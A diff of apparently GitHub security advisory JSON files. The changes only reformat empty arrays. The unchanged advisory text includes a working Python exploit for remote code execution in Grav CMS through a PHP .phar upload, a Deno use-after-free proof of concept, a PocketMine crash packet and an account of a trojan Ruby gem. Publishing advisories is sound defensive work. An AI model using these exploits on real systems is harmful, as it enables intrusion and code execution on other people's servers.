diff --git a/advisories/github-reviewed/2018/08/GHSA-2j55-pcw5-x4h2/GHSA-2j55-pcw5-x4h2.json b/advisories/github-reviewed/2018/08/GHSA-2j55-pcw5-x4h2/GHSA-2j55-pcw5-x4h2.json index 3617ba46980..649a2f2e1e4 100644 --- a/advisories/github-reviewed/2018/08/GHSA-2j55-pcw5-x4h2/GHSA-2j55-pcw5-x4h2.json +++ b/advisories/github-reviewed/2018/08/GHSA-2j55-pcw5-x4h2/GHSA-2j55-pcw5-x4h2.json @@ -8,9 +8,7 @@ ], "summary": "active-support impersonates 'activesupport' gem", "details": "The `active-support` ruby gem gem is malware and duplicates the official `activesupport` (no hyphen) gem, but adds a compiled extension. The extension attempts to resolve a base64 encoded domain (29faea63.planfhntage.de), downloads a payload, and executes.\n \nThis trojan horse gem could allow a remote attacker to execute arbitrary code on the system, caused by containing a malicious backdoor. An attacker could exploit this vulnerability to execute arbitrary code on the system. No version of this gem should be considered safe.", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { diff --git a/advisories/github-reviewed/2023/05/GHSA-c892-cwq6-qrqf/GHSA-c892-cwq6-qrqf.json b/advisories/github-reviewed/2023/05/GHSA-c892-cwq6-qrqf/GHSA-c892-cwq6-qrqf.json index 370caa59b90..c39f14dd38e 100644 --- a/advisories/github-reviewed/2023/05/GHSA-c892-cwq6-qrqf/GHSA-c892-cwq6-qrqf.json +++ b/advisories/github-reviewed/2023/05/GHSA-c892-cwq6-qrqf/GHSA-c892-cwq6-qrqf.json @@ -4,9 +4,7 @@ "modified": "2023-06-30T20:30:22Z", "published": "2023-05-26T18:30:21Z", "withdrawn": "2023-06-30T20:30:22Z", - "aliases": [ - - ], + "aliases": [], "summary": "Duplicate Advisory: Keycloak vulnerable to untrusted certificate validation", "details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-5cc8-pgp5-7mpm. This link is maintained to preserve external references.\n\n## Original Advisory\nA flaw was found in Keycloak. This flaw depends on a non-default configuration \"Revalidate Client Certificate\" to be enabled and the reverse proxy is not validating the certificate before Keycloak. Using this method an attacker may choose the certificate which will be validated by the server. If this happens and the KC_SPI_TRUSTSTORE_FILE_FILE variable is missing/misconfigured, any trustfile may be accepted with the logging information of \"Cannot validate client certificate trust: Truststore not available\". This may not impact availability as the attacker would have no access to the server, but consumer applications Integrity or Confidentiality may be impacted considering a possible access to them. Considering the environment is correctly set to use \"Revalidate Client Certificate\" this flaw is avoidable.", "severity": [ diff --git a/advisories/github-reviewed/2024/02/GHSA-c8v6-786g-vjx6/GHSA-c8v6-786g-vjx6.json b/advisories/github-reviewed/2024/02/GHSA-c8v6-786g-vjx6/GHSA-c8v6-786g-vjx6.json index a316c91db75..59f51940722 100644 --- a/advisories/github-reviewed/2024/02/GHSA-c8v6-786g-vjx6/GHSA-c8v6-786g-vjx6.json +++ b/advisories/github-reviewed/2024/02/GHSA-c8v6-786g-vjx6/GHSA-c8v6-786g-vjx6.json @@ -8,9 +8,7 @@ ], "summary": "json-jwt allows bypass of identity checks via a sign/encryption confusion attack", "details": "The json-jwt (aka JSON::JWT) gem 1.16.x before 1.16.6, 1.15.x before 1.15.3.1 for Ruby sometimes allows bypass of identity checks via a sign/encryption confusion attack. For example, JWE can sometimes be used to bypass JSON::JWT.decode.", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { @@ -86,9 +84,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2024-03-01T16:56:21Z", diff --git a/advisories/github-reviewed/2024/03/GHSA-3j27-563v-28wf/GHSA-3j27-563v-28wf.json b/advisories/github-reviewed/2024/03/GHSA-3j27-563v-28wf/GHSA-3j27-563v-28wf.json index 4dcc477c977..7b894d7fc37 100644 --- a/advisories/github-reviewed/2024/03/GHSA-3j27-563v-28wf/GHSA-3j27-563v-28wf.json +++ b/advisories/github-reviewed/2024/03/GHSA-3j27-563v-28wf/GHSA-3j27-563v-28wf.json @@ -8,9 +8,7 @@ ], "summary": "*const c_void / ExternalPointer unsoundness leading to use-after-free", "details": "### Summary\n\nUse of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, resulting in arbitrary code execution.\n\n\n### Details\n\n`*const c_void` and `ExternalPointer` (defined via `external!()` macros) types are used to represent `v8::External` wrapping arbitrary `void*` with an external lifetime. This is inherently unsafe as we are effectively eliding all Rust lifetime safety guarantees.\n\n`*const c_void` is trivially unsafe. `ExternalPointer` attempts to resolve this issue by wrapping the underlying pointer with a `usize`d marker ([`ExternalWithMarker`](https://github.com/denoland/deno_core/blob/a2838062a8f51926140a48a8aa926330c6f9070c/core/external.rs#L49)).\n\nHowever, the marker [relies on the randomness of PIE address (binary base address)](https://github.com/denoland/deno_core/blob/a2838062a8f51926140a48a8aa926330c6f9070c/core/external.rs#L10) which is still trivially exploitable for a non-PIE binary. It is also equally exploitable on a PIE binary when an attacker is able to derandomize the PIE address. This is problematic as it escalates an information leak of the PIE address into an exploitable vulnerability.\n\nNote that an attacker able to control code executed inside the Deno runtime is very likely to be able to bypass ASLR with any means necessary (e.g. by chaining another vulnerability, or by using other granted permissions such as `--allow-read` to read `/proc/self/maps`).\n\n\n### PoC\n\nFor simplicity, we use Deno version 1.38.0 where streaming operations uses `*const c_void`. Testing environment is Docker image `denoland/deno:alpine-1.38.0@sha256:fe51a00f4fbbaf1e72b29667c3eeeda429160cef2342f22a92c3820020d41f38` although the exact versions shouldn't matter much if it's in 1.36.2 up to 1.38.0 (before `ExternalPointer` patch, refer Impact section for details)\n\n```js\nconst ops = Deno[Deno.internal].core.ops;\nconst rid = ops.op_readable_stream_resource_allocate();\nconst sink = ops.op_readable_stream_resource_get_sink(rid);\n\n// close\nops.op_readable_stream_resource_close(sink);\nops.op_readable_stream_resource_close(sink);\n\n// reclaim BoundedBufferChannelInner\nconst ab = new ArrayBuffer(0x8058);\nconst dv = new DataView(ab);\n\n// forge chunk contents\ndv.setBigUint64(0, 2n, true);\ndv.setBigUint64(0x8030, 0x1337c0d30000n, true);\n\n// trigger segfault\nDeno.close(rid);\n```\n\nBelow is the dmesg log after the crash. We see that Deno has segfaulted on `1337c0d30008`, which is +8 of what we have written at offset 0x8030. Note also that the dereferenced value will immediately be used as a function pointer, with the first argument dereferenced from offset 0x8038 - it is trivial to use this to build an end-to-end exploit.\n\n```text\n[ 6439.821046] deno[15088]: segfault at 1337c0d30008 ip 0000557b53e2fb3e sp 00007fffd485ac70 error 4 in deno[557b51714000+2d7f000] likely on CPU 12 (core 12, socket 0)\n[ 6439.821054] Code: 00 00 00 00 48 85 c0 74 03 ff 50 08 49 8b 86 30 80 00 00 49 8b be 38 80 00 00 49 c7 86 30 80 00 00 00 00 00 00 48 85 c0 74 03 50 08 48 ff 03 48 83 c4 08 5b 41 5e c3 48 8d 3d 0d 1a 59 fb 48\n```\n\nThe same vulnerability exists for `ExternalPointer` implementation, but now it is required for the attacker to either leak the PIE address somehow, or else exploit unexpected aliasing behavior of `v8::External` values. The latter has not been investigated in depth, but it is theoretically possible to alias the same underlying pointer to different `v8::External` on different threads (Workers) and exploit the concurrency (`RefCell` may break this though).\n\n\n### Impact\n\nUse of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, which is exploitable by an attacker controlling the code executed inside a Deno runtime to obtain arbitrary code execution on the host machine regardless of permissions.\n\nThis bug is **known to be exploitable** for both `*const c_void` and `ExternalPointer` implementations.\n\nAffected versions of Deno is from 1.36.2 up to latest.\n\n- [ext/web/stream_resource.rs](https://github.com/denoland/deno/blob/main/ext/web/stream_resource.rs):\n - `*const c_void` introduced in 1.36.2\n - Patched into `ExternalPointer` in 1.38.1\n- [ext/http/http_next.rs](https://github.com/denoland/deno/blob/main/ext/http/http_next.rs):\n - `ExternalPointer` introduced in 1.38.2\n", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { @@ -43,9 +41,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2024-03-06T17:04:29Z", diff --git a/advisories/github-reviewed/2024/03/GHSA-82jf-8f24-xq9m/GHSA-82jf-8f24-xq9m.json b/advisories/github-reviewed/2024/03/GHSA-82jf-8f24-xq9m/GHSA-82jf-8f24-xq9m.json index c2164b5f2e3..a8bfdc85c55 100644 --- a/advisories/github-reviewed/2024/03/GHSA-82jf-8f24-xq9m/GHSA-82jf-8f24-xq9m.json +++ b/advisories/github-reviewed/2024/03/GHSA-82jf-8f24-xq9m/GHSA-82jf-8f24-xq9m.json @@ -8,9 +8,7 @@ ], "summary": "hexo-theme-anzhiyu Cross-site Scripting vulnerability", "details": "Cross Site Scripting (XSS) vulnerability in hexo-theme-anzhiyu v1.6.12, allows remote attackers to execute arbitrary code via the algolia search function.", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { diff --git a/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json b/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json index 0ed42236693..38ea09ccfe9 100644 --- a/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json +++ b/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json @@ -8,9 +8,7 @@ ], "summary": "Shopware's session is persistent in Cache for 404 pages", "details": "### Impact\n\nThe Symfony Session Handler, pop's the Session Cookie and assign it to the Response. Since Shopware 6.5.8.0 the 404 pages, are cached, to improve the performance of 404 pages. So the cached Response, contains a Session Cookie when the Browser accessing the 404 page, has no cookies yet. The Symfony Session Handler is in use, when no explicit Session configuration has been done.\nWhen Redis is in use for Sessions using the PHP Redis extension, this exploiting code is not used.\n\n### Patches\nUpdate to Shopware version 6.5.8.7\n\n### Workarounds\nUsing Redis for Sessions, as this does not trigger the exploit code. Example configuration for Redis\n\n```ini\n# php.ini\nsession.save_handler = redis\nsession.save_path = \"tcp://127.0.0.1:6379\"\n```\n\n## Consequences\n\nAs an guest browser session has been cached on a 404 page, every missing image or directly reaching a 404 page will logout the customer or clear his cart.\n", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { diff --git a/advisories/github-reviewed/2024/03/GHSA-cgqf-3cq5-wvcj/GHSA-cgqf-3cq5-wvcj.json b/advisories/github-reviewed/2024/03/GHSA-cgqf-3cq5-wvcj/GHSA-cgqf-3cq5-wvcj.json index b56a175e64b..392aeb4725b 100644 --- a/advisories/github-reviewed/2024/03/GHSA-cgqf-3cq5-wvcj/GHSA-cgqf-3cq5-wvcj.json +++ b/advisories/github-reviewed/2024/03/GHSA-cgqf-3cq5-wvcj/GHSA-cgqf-3cq5-wvcj.json @@ -8,9 +8,7 @@ ], "summary": "Apollo Router's Compressed Payloads do not respect HTTP Payload Limits", "details": "### Impact\nThe Apollo Router is a configurable, high-performance graph router written in Rust to run a federated supergraph that uses Apollo Federation. Affected versions are subject to a Denial-of-Service (DoS) type vulnerability. When receiving compressed HTTP payloads, affected versions of the Router evaluate the `limits.http_max_request_bytes` configuration option after the entirety of the compressed payload is decompressed. If affected versions of the Router receive highly compressed payloads, this could result in significant memory consumption while the compressed payload is expanded. \n\n### Patches\nRouter version 1.40.2 has a fix for the vulnerability.\n\n### Workarounds\nIf you are unable to upgrade, you may be able to implement mitigations at proxies or load balancers positioned in front of your Router fleet (e.g. Nginx, HAProxy, or cloud-native WAF services) by creating limits on HTTP body upload size. \n", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { diff --git a/advisories/github-reviewed/2024/03/GHSA-f6g2-h7qv-3m5v/GHSA-f6g2-h7qv-3m5v.json b/advisories/github-reviewed/2024/03/GHSA-f6g2-h7qv-3m5v/GHSA-f6g2-h7qv-3m5v.json index 00d1f675120..cedc93372d4 100644 --- a/advisories/github-reviewed/2024/03/GHSA-f6g2-h7qv-3m5v/GHSA-f6g2-h7qv-3m5v.json +++ b/advisories/github-reviewed/2024/03/GHSA-f6g2-h7qv-3m5v/GHSA-f6g2-h7qv-3m5v.json @@ -8,9 +8,7 @@ ], "summary": "Remote Code Execution by uploading a phar file using frontmatter", "details": "### Summary\n- Due to insufficient permission verification, user who can write a page use frontmatter feature.\n- Inadequate File Name Validation\n\n### Details\n1. Insufficient Permission Verification\n\nIn Grav CMS, \"[Frontmatter](https://learn.getgrav.org/17/content/headers)\" refers to the metadata block located at the top of a Markdown file. Frontmatter serves the purpose of providing additional information about a specific page or post.\nIn this feature, only administrators are granted access, while regular users who can create pages are not. However, if a regular user adds the data[_json][header][form] parameter to the POST Body while creating a page, they can use Frontmatter. The demonstration of this vulnerability is provided in video format. [Video Link](https://www.youtube.com/watch?v=EU1QA0idoWE)\n\n2. Inadequate File Name Validation\n\nTo create a Contact Form, Frontmatter and markdown can be written as follows:\n[Contact Form Example](https://learn.getgrav.org/17/forms/forms/example-form)\n[Form Action Save Option](https://learn.getgrav.org/17/forms/forms/reference-form-actions#save)\nWhen an external user submits the Contact Form after filling it out, the data is stored in the user/data folder. The filename under which the data is stored corresponds to the value specified in the filename attribute of the process property. For instance, if the filename attribute has a value of \"feedback.txt,\" a feedback.txt file is created in the user/data/contact folder. This file contains the value entered by the user in the \"name\" field. The problem with this functionality is the lack of validation for the filename attribute, potentially allowing the creation of files such as phar files on the server. An attacker could input arbitrary PHP code into the \"name\" field to be saved on the server. However, Grav filter the < and > characters, so to disable these options, an xss_check: false attribute should be added. [Disable XSS](https://learn.getgrav.org/17/forms/forms/form-options#xss-checks)\n\n```\n---\ntitle: Contact Form\n\nform:\n name: contact\n xss_check: false\n\n fields:\n name:\n label: Name\n placeholder: Enter your name\n autocomplete: on\n type: text\n validate:\n required: true\n\n buttons:\n submit:\n type: submit\n value: Submit\n\n process:\n save:\n filename: this_is_file_name.phar\n operation: add\n\n---\n\n# Contact form\n\nSome sample page content\n```\n\nExploiting these two vulnerabilities allows the following scenario:\n\n- A regular user account capable of creating pages is required.\n- An attacker creates a Contact Form page containing malicious Frontmatter using the regular user's account.\n- Accessing the Contact Form page, the attacker submits PHP code.\n- The attacker attempts Remote Code Execution by accessing HOST/user/data/[form-name]/[filename].\n\n### PoC\n\n[PoC Video Link](https://www.youtube.com/watch?v=Gh3ezpORbPc)\n\n```python\n# PoC.py\nimport requests\nfrom bs4 import BeautifulSoup\n\nclass Poc:\n\n def __init__(self, cmd):\n self.sess = requests.Session()\n\n ########## INIT ################\n self.USERNAME = \"guest\"\n self.PASSWORD = \"Guest123!\"\n self.PREFIX_URL = \"http://192.168.12.119:8888/grav\"\n self.PAGE_NAME = \"this_is_poc_page47\"\n self.PHP_FILE_NAME = \"universe.phar\"\n self.PAYLOAD = ''\n self.cmd = cmd\n ########## END ################\n\n self.sess.get(self.PREFIX_URL)\n self._login()\n self._save_page()\n self._inject_command()\n self._execute_command()\n \n\n def _get_nonce(self, data, name):\n # Get login nonce value\n res = BeautifulSoup(data, \"html.parser\")\n return res.find(\"input\", {\"name\" : name}).get(\"value\")\n\n \n def _login(self):\n print(\"[*] Try to Login\")\n res = self.sess.get(self.PREFIX_URL + \"/admin\")\n\n login_nonce = self._get_nonce(res.text, \"login-nonce\")\n\n # Login\n login_data = {\n \"data[username]\" : self.USERNAME,\n \"data[password]\" : self.PASSWORD,\n \"task\" : \"login\",\n \"login-nonce\" : login_nonce\n }\n res = self.sess.post(self.PREFIX_URL + \"/admin\", data=login_data)\n\n # Check login\n if res.status_code != 303:\n print(\"[!] username or password is wrong\")\n exit()\n \n print(\"[*] Success Login\")\n\n\n def _save_page(self):\n print(\"[*] Try to write page\")\n\n res = self.sess.get(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\")\n form_nonce = self._get_nonce(res.text, \"form-nonce\")\n unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n # Add page data\n page_data = f\"task=save&data%5Bheader%5D%5Btitle%5D={self.PAGE_NAME}&data%5Bcontent%5D=content&data%5Bheader%5D%5Bsearch%5D=&data%5Bfolder%5D={self.PAGE_NAME}&data%5Broute%5D=&data%5Bname%5D=form&data%5Bheader%5D%5Bbody_classes%5D=&data%5Bordering%5D=1&data%5Border%5D=&data%5Bheader%5D%5Border_by%5D=&data%5Bheader%5D%5Border_manual%5D=&data%5Bblueprint%5D=&data%5Blang%5D=&_post_entries_save=edit&__form-name__=flex-pages&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}&toggleable_data%5Bheader%5D%5Bpublished%5D=0&toggleable_data%5Bheader%5D%5Bdate%5D=0&toggleable_data%5Bheader%5D%5Bpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bunpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bmetadata%5D=0&toggleable_data%5Bheader%5D%5Bdateformat%5D=0&toggleable_data%5Bheader%5D%5Bmenu%5D=0&toggleable_data%5Bheader%5D%5Bslug%5D=0&toggleable_data%5Bheader%5D%5Bredirect%5D=0&toggleable_data%5Bheader%5D%5Bprocess%5D=0&toggleable_data%5Bheader%5D%5Btwig_first%5D=0&toggleable_data%5Bheader%5D%5Bnever_cache_twig%5D=0&toggleable_data%5Bheader%5D%5Bchild_type%5D=0&toggleable_data%5Bheader%5D%5Broutable%5D=0&toggleable_data%5Bheader%5D%5Bcache_enable%5D=0&toggleable_data%5Bheader%5D%5Bvisible%5D=0&toggleable_data%5Bheader%5D%5Bdebugger%5D=0&toggleable_data%5Bheader%5D%5Btemplate%5D=0&toggleable_data%5Bheader%5D%5Bappend_url_extension%5D=0&toggleable_data%5Bheader%5D%5Bredirect_default_route%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bdefault%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bcanonical%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Baliases%5D=0&toggleable_data%5Bheader%5D%5Badmin%5D%5Bchildren_display_order%5D=0&toggleable_data%5Bheader%5D%5Blogin%5D%5Bvisibility_requires_access%5D=0\"\n page_data += f\"&data%5B_json%5D%5Bheader%5D%5Bform%5D=%7B%22xss_check%22%3Afalse%2C%22name%22%3A%22contact-form%22%2C%22fields%22%3A%7B%22name%22%3A%7B%22label%22%3A%22Name%22%2C%22placeholder%22%3A%22Enter+php+code%22%2C%22autofocus%22%3A%22on%22%2C%22autocomplete%22%3A%22on%22%2C%22type%22%3A%22text%22%2C%22validate%22%3A%7B%22required%22%3Atrue%7D%7D%7D%2C%22process%22%3A%7B%22save%22%3A%7B%22filename%22%3A%22{self.PHP_FILE_NAME}%22%2C%22operation%22%3A%22add%22%7D%7D%2C%22buttons%22%3A%7B%22submit%22%3A%7B%22type%22%3A%22submit%22%2C%22value%22%3A%22Submit%22%7D%7D%7D\"\n res = self.sess.post(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\" , data = page_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})\n\n print(\"[*] Success write page: \" + self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n\n\n def _inject_command(self):\n print(\"[*] Try to inject php code\")\n\n res = self.sess.get(self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n form_nonce = self._get_nonce(res.text, \"form-nonce\")\n unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n form_data = f\"data%5Bname%5D={self.PAYLOAD}&__form-name__=contact-form&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}\"\n\n res = self.sess.post(self.PREFIX_URL + f\"/{self.PAGE_NAME}\" , data = form_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})\n\n print(\"[*] Success inject php code\")\n\n\n def _execute_command(self):\n res = self.sess.get(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n\n if res.status_code == 404:\n print(\"[!] Fail to execute command or not save php file.\")\n exit()\n\n print(\"[*] This is uploaded php file url.\")\n print(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n print(res.text)\n\n\nif __name__ == \"__main__\":\n Poc(cmd=\"id\")\n```\n\n### Impact\n\nRemote Code Execution\n", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { diff --git a/advisories/github-reviewed/2024/03/GHSA-xc7j-wj36-qjfr/GHSA-xc7j-wj36-qjfr.json b/advisories/github-reviewed/2024/03/GHSA-xc7j-wj36-qjfr/GHSA-xc7j-wj36-qjfr.json index 03871cf3a36..aa38e0635ff 100644 --- a/advisories/github-reviewed/2024/03/GHSA-xc7j-wj36-qjfr/GHSA-xc7j-wj36-qjfr.json +++ b/advisories/github-reviewed/2024/03/GHSA-xc7j-wj36-qjfr/GHSA-xc7j-wj36-qjfr.json @@ -3,9 +3,7 @@ "id": "GHSA-xc7j-wj36-qjfr", "modified": "2024-03-06T17:01:27Z", "published": "2024-03-06T17:01:27Z", - "aliases": [ - - ], + "aliases": [], "summary": "PocketMine-MP BookEditPacket crash when inventory slot in the packet is invalid", "details": "### Summary\nIf a client sends a BookEditPacket with InventorySlot greater than 35, the server will crash due to an unhandled exception thrown by `BaseInventory->getItem()`.\n\n### Details\nCrashes at https://github.com/pmmp/PocketMine-MP/blob/b744e09352a714d89220719ab6948a010ac636fc/src/network/mcpe/handler/InGamePacketHandler.php#L873\n\n### PoC\nUsing Gophertunnel, use `serverConn.WritePacket(&packet.BookEdit{InventorySlot: 36})`\n\n### Impact\nServer crash, all servers\n\n### Patched versions\nThis issue was fixed by 47f011966092f275cc1b11f8de635e89fd9651a7, and the fix was released in 5.11.2.", "severity": [ @@ -54,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-03-06T17:01:27Z", diff --git a/advisories/unreviewed/2021/11/GHSA-h25v-fr72-m765/GHSA-h25v-fr72-m765.json b/advisories/unreviewed/2021/11/GHSA-h25v-fr72-m765/GHSA-h25v-fr72-m765.json index 89ce50073a9..e52d3e666be 100644 --- a/advisories/unreviewed/2021/11/GHSA-h25v-fr72-m765/GHSA-h25v-fr72-m765.json +++ b/advisories/unreviewed/2021/11/GHSA-h25v-fr72-m765/GHSA-h25v-fr72-m765.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2021/12/GHSA-2hw2-7jq8-w9vp/GHSA-2hw2-7jq8-w9vp.json b/advisories/unreviewed/2021/12/GHSA-2hw2-7jq8-w9vp/GHSA-2hw2-7jq8-w9vp.json index 595ba1f7228..e82ec424274 100644 --- a/advisories/unreviewed/2021/12/GHSA-2hw2-7jq8-w9vp/GHSA-2hw2-7jq8-w9vp.json +++ b/advisories/unreviewed/2021/12/GHSA-2hw2-7jq8-w9vp/GHSA-2hw2-7jq8-w9vp.json @@ -7,12 +7,8 @@ "CVE-2021-24849" ], "details": "The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2021/12/GHSA-39hj-6v7j-qq5j/GHSA-39hj-6v7j-qq5j.json b/advisories/unreviewed/2021/12/GHSA-39hj-6v7j-qq5j/GHSA-39hj-6v7j-qq5j.json index a03d6bc2c7b..28766d7b503 100644 --- a/advisories/unreviewed/2021/12/GHSA-39hj-6v7j-qq5j/GHSA-39hj-6v7j-qq5j.json +++ b/advisories/unreviewed/2021/12/GHSA-39hj-6v7j-qq5j/GHSA-39hj-6v7j-qq5j.json @@ -7,12 +7,8 @@ "CVE-2021-45253" ], "details": "The id parameter in view_storage.php from Simple Cold Storage Management System 1.0 appears to be vulnerable to SQL injection attacks. A payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2021/12/GHSA-3hwx-vc7v-fw2m/GHSA-3hwx-vc7v-fw2m.json b/advisories/unreviewed/2021/12/GHSA-3hwx-vc7v-fw2m/GHSA-3hwx-vc7v-fw2m.json index ecab93d3290..f0b5b071e69 100644 --- a/advisories/unreviewed/2021/12/GHSA-3hwx-vc7v-fw2m/GHSA-3hwx-vc7v-fw2m.json +++ b/advisories/unreviewed/2021/12/GHSA-3hwx-vc7v-fw2m/GHSA-3hwx-vc7v-fw2m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2021/12/GHSA-69j8-jpx9-w6wr/GHSA-69j8-jpx9-w6wr.json b/advisories/unreviewed/2021/12/GHSA-69j8-jpx9-w6wr/GHSA-69j8-jpx9-w6wr.json index 458d9d5a65f..a9ca686a2af 100644 --- a/advisories/unreviewed/2021/12/GHSA-69j8-jpx9-w6wr/GHSA-69j8-jpx9-w6wr.json +++ b/advisories/unreviewed/2021/12/GHSA-69j8-jpx9-w6wr/GHSA-69j8-jpx9-w6wr.json @@ -7,12 +7,8 @@ "CVE-2021-44544" ], "details": "DIAEnergie Version 1.7.5 and prior is vulnerable to multiple cross-site scripting vulnerabilities when arbitrary code is injected into the parameter “name” of the script “HandlerEnergyType.ashx”.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2021/12/GHSA-76hh-gp2h-4r6g/GHSA-76hh-gp2h-4r6g.json b/advisories/unreviewed/2021/12/GHSA-76hh-gp2h-4r6g/GHSA-76hh-gp2h-4r6g.json index d86d14285c3..e5b69198824 100644 --- a/advisories/unreviewed/2021/12/GHSA-76hh-gp2h-4r6g/GHSA-76hh-gp2h-4r6g.json +++ b/advisories/unreviewed/2021/12/GHSA-76hh-gp2h-4r6g/GHSA-76hh-gp2h-4r6g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2021/12/GHSA-7r9v-pc59-6q7w/GHSA-7r9v-pc59-6q7w.json b/advisories/unreviewed/2021/12/GHSA-7r9v-pc59-6q7w/GHSA-7r9v-pc59-6q7w.json index fe6ad5460a2..10dce0e37d9 100644 --- a/advisories/unreviewed/2021/12/GHSA-7r9v-pc59-6q7w/GHSA-7r9v-pc59-6q7w.json +++ b/advisories/unreviewed/2021/12/GHSA-7r9v-pc59-6q7w/GHSA-7r9v-pc59-6q7w.json @@ -7,12 +7,8 @@ "CVE-2021-36341" ], "details": "Dell Wyse Device Agent version 14.5.4.1 and below contain a sensitive data exposure vulnerability. A local authenticated user with low privileges could potentially exploit this vulnerability in order to access sensitive information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2021/12/GHSA-8852-jmw6-m5gc/GHSA-8852-jmw6-m5gc.json b/advisories/unreviewed/2021/12/GHSA-8852-jmw6-m5gc/GHSA-8852-jmw6-m5gc.json index a0d8ec189e0..a8487eb03ff 100644 --- a/advisories/unreviewed/2021/12/GHSA-8852-jmw6-m5gc/GHSA-8852-jmw6-m5gc.json +++ b/advisories/unreviewed/2021/12/GHSA-8852-jmw6-m5gc/GHSA-8852-jmw6-m5gc.json @@ -7,12 +7,8 @@ "CVE-2021-24956" ], "details": "The Blog2Social: Social Media Auto Post & Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2021/12/GHSA-88qr-cjgj-jggp/GHSA-88qr-cjgj-jggp.json b/advisories/unreviewed/2021/12/GHSA-88qr-cjgj-jggp/GHSA-88qr-cjgj-jggp.json index 2773818fcbf..dc77518aa88 100644 --- a/advisories/unreviewed/2021/12/GHSA-88qr-cjgj-jggp/GHSA-88qr-cjgj-jggp.json +++ b/advisories/unreviewed/2021/12/GHSA-88qr-cjgj-jggp/GHSA-88qr-cjgj-jggp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2021/12/GHSA-c57m-77h8-88cm/GHSA-c57m-77h8-88cm.json b/advisories/unreviewed/2021/12/GHSA-c57m-77h8-88cm/GHSA-c57m-77h8-88cm.json index e52253b4bcb..7ebbce96120 100644 --- a/advisories/unreviewed/2021/12/GHSA-c57m-77h8-88cm/GHSA-c57m-77h8-88cm.json +++ b/advisories/unreviewed/2021/12/GHSA-c57m-77h8-88cm/GHSA-c57m-77h8-88cm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git 